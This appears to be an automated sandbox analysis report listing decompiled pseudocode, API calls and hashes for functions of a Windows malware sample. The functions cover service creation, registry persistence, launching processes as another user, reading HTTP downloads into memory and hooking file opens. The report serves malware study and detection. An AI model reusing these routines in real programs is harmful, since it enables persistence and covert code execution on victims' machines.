                                                                                                        			E709884F0(void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _t7;
				struct HWND__* _t13;
				WCHAR* _t20;
				intOrPtr _t21;
				struct HWND__* _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				intOrPtr _t38;
				void* _t40;
				struct HINSTANCE__* _t46;
				struct HWND__* _t47;
				void* _t51;
				void* _t52;
				void* _t53;

				_t51 = __ebp;
				_t34 = _a8;
				if(_t34 == 0x275b || _t34 == 0x2755 || _t34 == 0x2ae1) {
					return 0;
				} else {
					_t46 = _a4;
					_t7 = E70985180(_t46, _t34);
					_t53 = _t52 + 8;
					_t40 = _t7;
					_push(_a20);
					_push(_a16);
					_push(_a12);
					if(_t40 == 0) {
						_t47 =  *0x7098f698(_t46, _t34);
					} else {
						_t31 = CreateDialogIndirectParamW(_t46, _t40, ??, ??, ??); // executed
						_t47 = _t31;
						HeapFree(GetProcessHeap(), 0, _t40);
					}
					if(_t47 == 0) {
						L17:
						return _t47;
					} else {
						SetWindowTextW(_t47, StrChrW(0x7098ce0c, 0)); // executed
						if(_t34 != 0x2872) {
							if(_t34 != 0x2768) {
								goto L17;
							} else {
								_t13 = GetDlgItem(_t47, 0x4e7d);
								_push(0);
								_push(0);
								if(_t13 == 0) {
									PostMessageW(_t47, 0x10, ??, ??);
									goto L17;
								} else {
									PostMessageW(_t13, 0xf5, ??, ??);
									return _t47;
								}
							}
						} else {
							if( *0x7098f564 != 0) {
								E70985640(_t51, 1);
								_t53 = _t53 + 4;
								ExitProcess(0);
							}
							_push(0);
							_push(StrChrW(0x7098c490, 0x2e));
							E70982960();
							_push(0);
							_push(StrChrW(0x7098cbb8, 0x50));
							_t20 = StrChrW(0x7098cb94, 0x55);
							_t36 =  *0x7098f5f4; // 0x1
							_t21 =  *0x7098f5e4; // 0xa42bb0
							 *0x7098f5f0 = E70984F60(_t36, _t21, _t20);
							 *0x7098f5bc = E70983DC0();
							E70984FD0(0);
							if( *0x7098f55c != 0) {
								_t38 =  *0x7098f5e4; // 0xa42bb0
								_push(0xffffffff);
								E70983760(_t38);
								ExitProcess(0);
							}
							 *0x7098f3c8 = _t47;
							CallWindowProcW(E70987D00, _t47, 0x83fc, GetWindowLongW(_t47, 0xfffffffc), 0); // executed
							SetWindowLongW(_t47, 0xfffffffc, E70987D00);
							return _t47;
						}
					}
				}
			}

















                                                                                                        0x709884f0
                                                                                                        0x709884f1
                                                                                                        0x709884fb
                                                                                                        0x7098869e
                                                                                                        0x70988519
                                                                                                        0x7098851a
                                                                                                        0x70988521
                                                                                                        0x7098852e
                                                                                                        0x70988531
                                                                                                        0x70988537
                                                                                                        0x70988538
                                                                                                        0x70988539
                                                                                                        0x7098853c
                                                                                                        0x70988562
                                                                                                        0x7098853e
                                                                                                        0x70988540
                                                                                                        0x70988549
                                                                                                        0x70988552
                                                                                                        0x70988552
                                                                                                        0x70988566
                                                                                                        0x70988693
                                                                                                        0x70988698
                                                                                                        0x7098856c
                                                                                                        0x7098857d
                                                                                                        0x70988589
                                                                                                        0x70988660
                                                                                                        0x00000000
                                                                                                        0x70988662
                                                                                                        0x70988668
                                                                                                        0x7098866e
                                                                                                        0x70988670
                                                                                                        0x70988674
                                                                                                        0x7098868d
                                                                                                        0x00000000
                                                                                                        0x70988676
                                                                                                        0x7098867c
                                                                                                        0x70988687
                                                                                                        0x70988687
                                                                                                        0x70988674
                                                                                                        0x7098858f
                                                                                                        0x70988596
                                                                                                        0x7098859a
                                                                                                        0x7098859f
                                                                                                        0x709885a4
                                                                                                        0x709885a4
                                                                                                        0x709885aa
                                                                                                        0x709885b5
                                                                                                        0x709885b6
                                                                                                        0x709885be
                                                                                                        0x709885c9
                                                                                                        0x709885d1
                                                                                                        0x709885d3
                                                                                                        0x709885da
                                                                                                        0x709885e6
                                                                                                        0x709885f2
                                                                                                        0x709885f7
                                                                                                        0x70988606
                                                                                                        0x70988608
                                                                                                        0x7098860e
                                                                                                        0x70988611
                                                                                                        0x7098861b
                                                                                                        0x7098861b
                                                                                                        0x70988626
                                                                                                        0x7098863e
                                                                                                        0x7098864c
                                                                                                        0x70988657
                                                                                                        0x70988657
                                                                                                        0x70988589
                                                                                                        0x70988566

                                                                                                        APIs
                                                                                                          • Part of subcall function 70985180: FindResourceW.KERNEL32(?,?,00000005), ref: 70985191
                                                                                                          • Part of subcall function 70985180: LoadResource.KERNEL32(?,00000000), ref: 709851A0
                                                                                                          • Part of subcall function 70985180: SizeofResource.KERNEL32(?,00000000), ref: 709851AE
                                                                                                          • Part of subcall function 70985180: LockResource.KERNEL32(00000000), ref: 709851B7
                                                                                                          • Part of subcall function 70985180: GetProcessHeap.KERNEL32(00000008,00000000), ref: 709851C6
                                                                                                          • Part of subcall function 70985180: HeapAlloc.KERNEL32(00000000), ref: 709851CD
                                                                                                          • Part of subcall function 70985180: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 709851D8
                                                                                                          • Part of subcall function 70985180: FreeResource.KERNEL32(00000000), ref: 70985207
                                                                                                        • CreateDialogIndirectParamW.USER32 ref: 70988540
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098854B
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70988552
                                                                                                        • StrChrW.SHLWAPI(7098CE0C,00000000), ref: 70988579
                                                                                                        • SetWindowTextW.USER32(00000000,00000000), ref: 7098857D
                                                                                                        • ExitProcess.KERNEL32 ref: 709885A4
                                                                                                        • StrChrW.SHLWAPI(7098C490,0000002E,00000000), ref: 709885B3
                                                                                                          • Part of subcall function 70982960: RtlZeroMemory.NTDLL(00000250,00000250), ref: 70982974
                                                                                                          • Part of subcall function 70982960: RtlZeroMemory.NTDLL(?,00000410), ref: 70982986
                                                                                                          • Part of subcall function 70982960: StrChrW.SHLWAPI(7098C564,00000025,00A4B6C8,?,00000410,00000250,00000250,00000000,00000000,00000000,?), ref: 7098299F
                                                                                                          • Part of subcall function 70982960: wsprintfW.USER32 ref: 709829B0
                                                                                                          • Part of subcall function 70982960: StrChrW.SHLWAPI(7098C550,00000025,7098C560,0000002A,?), ref: 709829D2
                                                                                                          • Part of subcall function 70982960: wsprintfW.USER32 ref: 709829D6
                                                                                                          • Part of subcall function 70982960: FindFirstFileW.KERNEL32(?,?), ref: 709829E8
                                                                                                          • Part of subcall function 70982960: StrChrW.SHLWAPI(7098C548,0000002E), ref: 70982A0C
                                                                                                          • Part of subcall function 70982960: lstrcmpW.KERNEL32(?,00000000), ref: 70982A14
                                                                                                          • Part of subcall function 70982960: StrChrW.SHLWAPI(7098C540,0000002E), ref: 70982A21
                                                                                                          • Part of subcall function 70982960: lstrcmpW.KERNEL32(?,00000000), ref: 70982A29
                                                                                                          • Part of subcall function 70982960: lstrcatW.KERNEL32(?,?), ref: 70982A3C
                                                                                                          • Part of subcall function 70982960: FindNextFileW.KERNEL32(00000000,?), ref: 70982A95
                                                                                                          • Part of subcall function 70982960: FindClose.KERNEL32(00000000), ref: 70982AA4
                                                                                                        • StrChrW.SHLWAPI(7098CBB8,00000050,00000000), ref: 709885C7
                                                                                                        • StrChrW.SHLWAPI(7098CB94,00000055,00000000), ref: 709885D1
                                                                                                          • Part of subcall function 70983DC0: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 70983DDC
                                                                                                          • Part of subcall function 70983DC0: OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 70983DEC
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C90C,00000055,000F01FF), ref: 70983E13
                                                                                                          • Part of subcall function 70983DC0: OpenServiceW.ADVAPI32(00000000,00000000), ref: 70983E17
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C8E4,00000055,00A42C0A), ref: 70983E4D
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C8D0,00000073,00000000), ref: 70983E57
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C868,00000025,00000000), ref: 70983E61
                                                                                                          • Part of subcall function 70983DC0: wsprintfW.USER32 ref: 70983E6C
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C83C,00000055,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 70983E99
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C90C,00000055,00000000), ref: 70983EA3
                                                                                                          • Part of subcall function 70983DC0: CreateServiceW.ADVAPI32(?,00000000), ref: 70983EAB
                                                                                                          • Part of subcall function 70984FD0: StrChrW.SHLWAPI(7098CA5C,00000052), ref: 70984FEC
                                                                                                          • Part of subcall function 70984FD0: StrChrW.SHLWAPI(7098CA4C,00000025,007488D8,00000000), ref: 70984FF7
                                                                                                          • Part of subcall function 70984FD0: wsprintfW.USER32 ref: 70985005
                                                                                                          • Part of subcall function 70984FD0: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 70985029
                                                                                                          • Part of subcall function 70984FD0: RegDeleteValueW.ADVAPI32(?,00A42C0A), ref: 7098504B
                                                                                                          • Part of subcall function 70984FD0: RegCloseKey.ADVAPI32(?), ref: 70985056
                                                                                                        • ExitProcess.KERNEL32 ref: 7098861B
                                                                                                        • GetWindowLongW.USER32(00000000,000000FC), ref: 7098862C
                                                                                                        • CallWindowProcW.USER32(Function_00007D00,00000000,000083FC,00000000), ref: 7098863E
                                                                                                        • SetWindowLongW.USER32 ref: 7098864C
                                                                                                          • Part of subcall function 70983760: CreateEnvironmentBlock.USERENV ref: 70983791
                                                                                                          • Part of subcall function 70983760: RtlZeroMemory.NTDLL(?,00000044), ref: 709837AB
                                                                                                          • Part of subcall function 70983760: StrChrW.SHLWAPI(7098C678,00000057,?,00000044,?,00000000), ref: 709837BF
                                                                                                          • Part of subcall function 70983760: RtlZeroMemory.NTDLL(?,00000010), ref: 709837D0
                                                                                                          • Part of subcall function 70983760: CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,00000010,?,00000000), ref: 70983800
                                                                                                          • Part of subcall function 70983760: Sleep.KERNEL32(000001F4,?,00000000), ref: 7098380B
                                                                                                          • Part of subcall function 70983760: DestroyEnvironmentBlock.USERENV(?), ref: 7098383E
                                                                                                          • Part of subcall function 70983760: CloseHandle.KERNEL32(00000000), ref: 70983844
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CreateMemoryProcessResource$FindHeapWindowZerowsprintf$CloseOpen$BlockEnvironmentExitFileFreeLongManagerServicelstrcmp$AllocCallDeleteDestroyDialogFirstHandleIndirectLoadLockMoveNextParamProcSizeofSleepTextUserValuelstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 1181730545-0
                                                                                                        • Opcode ID: 3c6ddeabbdaa38f344e409053d08be58fa2ac47d56cfe215da8110ce34a415de
                                                                                                        • Instruction ID: ce3f297e72e0eba5edc2372c46e80fbe2c730d81332332856c30b9a20a9dc401
                                                                                                        • Opcode Fuzzy Hash: 3c6ddeabbdaa38f344e409053d08be58fa2ac47d56cfe215da8110ce34a415de
                                                                                                        • Instruction Fuzzy Hash: E241ACB2658310AFD21057A6DC49F6F776CAB94716F204126FA02E63E0EB7598019AA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70988210, Relevance: 21.1, APIs: 14, Instructions: 132filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E70988210(signed int __eax, long _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28) {
				long _v0;
				short _v532;
				short _v540;
				signed int _t19;
				void* _t22;
				WCHAR* _t24;
				WCHAR* _t27;
				WCHAR* _t34;
				void* _t40;
				intOrPtr _t45;
				intOrPtr _t46;
				long _t50;
				WCHAR* _t53;
				intOrPtr _t55;
				WCHAR* _t58;
				WCHAR* _t62;
				void* _t63;

				_t19 = __eax;
				_t62 = _a4;
				if(_t62 == 0) {
					L10:
					_t22 = CreateFileW(_t62, _a8, _a12, _a16, _a20, _a24, _a28); // executed
					return _t22;
				} else {
					if(_v0 != 0x3a) {
						_t58 = PathFindFileNameW(_t62);
						_t24 =  *0x7098f5d8; // 0xa610b8
						if(lstrcmpiW(_t62, _t24) == 0) {
							_pop(_t58);
							_pop(_t62);
							_t63 = _t63 + 0x20c;
							_t50 =  *0x7098f5e4; // 0xa42bb0
							_a4 = _t50;
							goto ( *0x7098f654);
						}
						_t53 =  *0x7098f61c; // 0x77af54
						_t19 = lstrcmpiW(_t58, _t53);
						if(_t19 == 0) {
							goto L2;
						} else {
							_t27 =  *0x7098f604; // 0x749734
							_t19 = StrCmpNIW(_t62, _t27, 0xb);
							if(_t19 == 0) {
								goto L2;
							} else {
								if(lstrcmpiW(_t58, StrChrW(0x7098cdfc, 0x74)) != 0) {
									goto L10;
								} else {
									_t45 =  *0x7098f5cc; // 0xa4b6c8
									_push(_t58);
									_push(_t45);
									wsprintfW( &_v540, StrChrW(0x7098c658, 0x25));
									if(lstrcmpiW( &_v532, _t62) != 0) {
										goto L10;
									} else {
										_t34 = StrChrW(0x7098cdf0, 0x2e);
										_t46 =  *0x7098f600; // 0x749736
										_t55 =  *0x7098f5cc; // 0xa4b6c8
										_push(_t34);
										_push(_t46);
										_push(_t55);
										wsprintfW( &_v540, StrChrW(0x7098ca08, 0x25));
										_t40 = CreateFileW( &_v532, _v0, _a4, _a8, _a12, _a16, _a20); // executed
										return _t40;
									}
								}
							}
						}
					} else {
						L2:
						return _t19 | 0xffffffff;
					}
				}
			}




















                                                                                                        0x70988210
                                                                                                        0x70988218
                                                                                                        0x70988223
                                                                                                        0x70988354
                                                                                                        0x70988385
                                                                                                        0x70988395
                                                                                                        0x70988229
                                                                                                        0x7098822e
                                                                                                        0x7098824d
                                                                                                        0x7098824f
                                                                                                        0x7098825a
                                                                                                        0x7098825c
                                                                                                        0x7098825e
                                                                                                        0x70988260
                                                                                                        0x70988266
                                                                                                        0x7098826c
                                                                                                        0x70988270
                                                                                                        0x70988270
                                                                                                        0x70988276
                                                                                                        0x7098827e
                                                                                                        0x70988282
                                                                                                        0x00000000
                                                                                                        0x70988284
                                                                                                        0x70988284
                                                                                                        0x7098828d
                                                                                                        0x70988295
                                                                                                        0x00000000
                                                                                                        0x70988297
                                                                                                        0x709882ac
                                                                                                        0x00000000
                                                                                                        0x709882b2
                                                                                                        0x709882b2
                                                                                                        0x709882b8
                                                                                                        0x709882b9
                                                                                                        0x709882cf
                                                                                                        0x709882de
                                                                                                        0x00000000
                                                                                                        0x709882e0
                                                                                                        0x709882e7
                                                                                                        0x709882e9
                                                                                                        0x709882ef
                                                                                                        0x709882f5
                                                                                                        0x709882f6
                                                                                                        0x709882f7
                                                                                                        0x70988307
                                                                                                        0x70988341
                                                                                                        0x70988351
                                                                                                        0x70988351
                                                                                                        0x709882de
                                                                                                        0x709882ac
                                                                                                        0x70988295
                                                                                                        0x70988233
                                                                                                        0x70988233
                                                                                                        0x7098823d
                                                                                                        0x7098823d
                                                                                                        0x7098822e

                                                                                                        APIs
                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 70988241
                                                                                                        • lstrcmpiW.KERNEL32(?,00A610B8), ref: 70988256
                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 70988385
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$CreateFindNamePathlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 3438131021-0
                                                                                                        • Opcode ID: 8c87acb731ddd61b31dad663b6a96822009f1d73b14ea108c15dce2b40d40ad2
                                                                                                        • Instruction ID: b21e3bcbceb805d9c86d392a9602a85287e908dfac03dbadcfee4f480ee88fb0
                                                                                                        • Opcode Fuzzy Hash: 8c87acb731ddd61b31dad663b6a96822009f1d73b14ea108c15dce2b40d40ad2
                                                                                                        • Instruction Fuzzy Hash: CF4132B3214344ABD220DB95DC98FBB73ACEBD8750F10462EF959D2390E734A8059772
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985900, Relevance: 21.1, APIs: 14, Instructions: 117memorynetworkfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70985900(void* _a4, intOrPtr* _a8) {
				long _v4;
				void _v8;
				void* _v16;
				long* _v20;
				intOrPtr _v28;
				long _v32;
				void* _v44;
				int _v48;
				long _v60;
				void* _t25;
				int _t34;
				int _t35;
				long _t40;
				void* _t44;
				long _t53;
				DWORD* _t54;

				_t54 = 0;
				_t53 = 0;
				_t25 = HeapAlloc(GetProcessHeap(), 8, 0x2000); // executed
				_t44 = _t25;
				if(_t44 == 0) {
					 *_a8 = 0;
					return 0;
				} else {
					_v8 = 0;
					_v4 = 4;
					if(HttpQueryInfoW(_a4, 0x20000013,  &_v8,  &_v4, 0) != 0 && _v28 == 0xc8) {
						_v32 = 0;
						_t34 = InternetReadFile(_v16, _t44, 0x1fff,  &_v32); // executed
						if(_t34 != 0) {
							while(1) {
								_t35 = _v48;
								if(_t35 == 0) {
									goto L15;
								}
								if(_t54 > 0x100000) {
									if(_t53 != 0) {
										goto L13;
									}
									goto L14;
								} else {
									if(_t53 != 0) {
										_t40 = HeapReAlloc(GetProcessHeap(), 0, _t53, _t35 + _t54 + 1);
										if(_t40 == 0) {
											L13:
											HeapFree(GetProcessHeap(), 0, _t53);
											L14:
											_t53 = 0;
											_t54 = 0;
										} else {
											goto L10;
										}
									} else {
										_t12 = _t54 + 1; // 0x20000014
										_t40 = HeapAlloc(GetProcessHeap(), _t53, _t35 + _t12);
										L10:
										_t53 = _t40;
										RtlMoveMemory(_t53 + _t54, _t44, _v48);
										_t54 = _t54 + _v60;
										 *(_t53 + _t54) = 0;
										_v60 = 0;
										if(InternetReadFile(_v44, _t44, 0x1fff,  &_v60) != 0) {
											continue;
										} else {
										}
									}
								}
								goto L15;
							}
						}
					}
					L15:
					RtlFreeHeap(GetProcessHeap(), 0, _t44); // executed
					 *_v20 = _t53;
					return _t54;
				}
			}



















                                                                                                        0x70985914
                                                                                                        0x70985916
                                                                                                        0x7098591b
                                                                                                        0x70985921
                                                                                                        0x70985925
                                                                                                        0x70985a3f
                                                                                                        0x70985a4a
                                                                                                        0x7098592b
                                                                                                        0x70985940
                                                                                                        0x70985944
                                                                                                        0x70985954
                                                                                                        0x70985978
                                                                                                        0x7098597c
                                                                                                        0x70985984
                                                                                                        0x70985990
                                                                                                        0x70985990
                                                                                                        0x70985996
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709859a2
                                                                                                        0x70985a0d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709859a4
                                                                                                        0x709859a6
                                                                                                        0x709859c4
                                                                                                        0x709859cc
                                                                                                        0x70985a0f
                                                                                                        0x70985a15
                                                                                                        0x70985a1b
                                                                                                        0x70985a1b
                                                                                                        0x70985a1d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709859a8
                                                                                                        0x709859a8
                                                                                                        0x709859b1
                                                                                                        0x709859ce
                                                                                                        0x709859d3
                                                                                                        0x709859da
                                                                                                        0x709859df
                                                                                                        0x709859f2
                                                                                                        0x709859f7
                                                                                                        0x70985a07
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985a09
                                                                                                        0x70985a07
                                                                                                        0x709859a6
                                                                                                        0x00000000
                                                                                                        0x709859a2
                                                                                                        0x70985990
                                                                                                        0x70985984
                                                                                                        0x70985a1f
                                                                                                        0x70985a25
                                                                                                        0x70985a2f
                                                                                                        0x70985a3a
                                                                                                        0x70985a3a

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000000), ref: 70985918
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098591B
                                                                                                        • HttpQueryInfoW.WININET ref: 7098594C
                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 7098597C
                                                                                                        • GetProcessHeap.KERNEL32(00000000,20000014), ref: 709859AE
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 709859B1
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 709859C1
                                                                                                        • HeapReAlloc.KERNEL32(00000000), ref: 709859C4
                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,20000013), ref: 709859DA
                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 709859FF
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70985A12
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70985A15
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70985A22
                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 70985A25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$Alloc$FileFreeInternetRead$HttpInfoMemoryMoveQuery
                                                                                                        • String ID:
                                                                                                        • API String ID: 1362589046-0
                                                                                                        • Opcode ID: 6f99bdd210985e9d76c6974bcb536ce0ecef94cc6d5ee30f1445ffc4189d353c
                                                                                                        • Instruction ID: 2e1bc967e335a841726d825d5c69c93c61ffe0d8e0296f1c2b1a61e9b3e703f2
                                                                                                        • Opcode Fuzzy Hash: 6f99bdd210985e9d76c6974bcb536ce0ecef94cc6d5ee30f1445ffc4189d353c
                                                                                                        • Instruction Fuzzy Hash: 68317FB2218345ABD300DF96DC84F6B77ADFB88754F104A2DF956D3280DB34D9098A62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004B4BE2, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 112libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,LdrUnloadDll,?,?,?,?,004B47C5,kernel32.dll,lstrcmpW,0082708C,004B4E0B), ref: 004B4C00
                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 004B4C7C
                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,004B47C5,kernel32.dll,lstrcmpW,0082708C,004B4E0B), ref: 004B4C9E
                                                                                                        • LoadLibraryA.KERNEL32(security.dll,?,?,?,?,004B47C5,kernel32.dll,lstrcmpW,0082708C,004B4E0B), ref: 004B4CB1
                                                                                                        • InterlockedExchange.KERNEL32(00000001,00000000), ref: 004B4CB7
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,004B47C5,kernel32.dll,lstrcmpW,0082708C,004B4E0B), ref: 004B4CC2
                                                                                                        • InterlockedExchange.KERNEL32(00805004,00000000), ref: 004B4CEF
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,004B47C5,kernel32.dll,lstrcmpW,0082708C,004B4E0B), ref: 004B4CFA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Library$ExchangeInterlocked$FreeLoad$HandleModule
                                                                                                        • String ID: LdrUnloadDll$ntdll.dll$security.dll$ft
                                                                                                        • API String ID: 3965272021-579589440
                                                                                                        • Opcode ID: dc4634acba12b4e2aa2b22c9cfba4cba992891e70106b89f443a36c3aa50dda0
                                                                                                        • Instruction ID: 33dceadfb9b2b82d47577c4016ca292e05a1d2d94e79d44919137fa0ec80249f
                                                                                                        • Opcode Fuzzy Hash: dc4634acba12b4e2aa2b22c9cfba4cba992891e70106b89f443a36c3aa50dda0
                                                                                                        • Instruction Fuzzy Hash: F331EF31201606ABDB219F25AC44AEB3FB9BFC1B51B128022F94197362D73DCC15DBB9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709834E0, Relevance: 19.6, APIs: 13, Instructions: 108memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E709834E0() {
				intOrPtr _v4;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				void* _v24;
				long _v28;
				int _t25;
				int _t33;
				void* _t56;

				_v12 = 0;
				_v20 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v20) == 0) {
					return 0;
				} else {
					_v24 = 0;
					_t25 = GetTokenInformation(_v20, 1, 0, 0,  &_v24); // executed
					if(_t25 == 0 && GetLastError() == 0x7a) {
						_t56 = HeapAlloc(GetProcessHeap(), 8, _v28);
						if(_t56 != 0) {
							_t33 = GetTokenInformation(_v24, 1, _t56, _v28,  &_v28); // executed
							if(_t33 != 0) {
								_v16.Value = 0;
								_v12 = 0x500;
								_v24 = 0;
								if(AllocateAndInitializeSid( &_v16, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
									if(EqualSid( *_t56, _v24) == 0) {
										_push(_v4);
										_push( *_t56);
										L7098BF98();
									} else {
										_v20 = 1;
									}
								}
								FreeSid(_v24);
							}
							HeapFree(GetProcessHeap(), 0, _t56);
						}
					}
					CloseHandle(_v24);
					return _v16.Value;
				}
			}












                                                                                                        0x709834f2
                                                                                                        0x709834f6
                                                                                                        0x70983502
                                                                                                        0x709835fe
                                                                                                        0x70983508
                                                                                                        0x7098351d
                                                                                                        0x70983521
                                                                                                        0x70983525
                                                                                                        0x70983551
                                                                                                        0x70983555
                                                                                                        0x7098356d
                                                                                                        0x70983571
                                                                                                        0x70983588
                                                                                                        0x7098358c
                                                                                                        0x70983593
                                                                                                        0x7098359f
                                                                                                        0x709835b1
                                                                                                        0x709835c3
                                                                                                        0x709835c4
                                                                                                        0x709835c5
                                                                                                        0x709835b3
                                                                                                        0x709835b3
                                                                                                        0x709835b3
                                                                                                        0x709835b1
                                                                                                        0x709835cf
                                                                                                        0x709835cf
                                                                                                        0x709835da
                                                                                                        0x709835da
                                                                                                        0x709835e0
                                                                                                        0x709835e6
                                                                                                        0x709835f6
                                                                                                        0x709835f6

                                                                                                        APIs
                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000100,00000000), ref: 709834FA
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?,77E34620), ref: 70983521
                                                                                                        • GetLastError.KERNEL32 ref: 7098352B
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,74B04F20), ref: 70983548
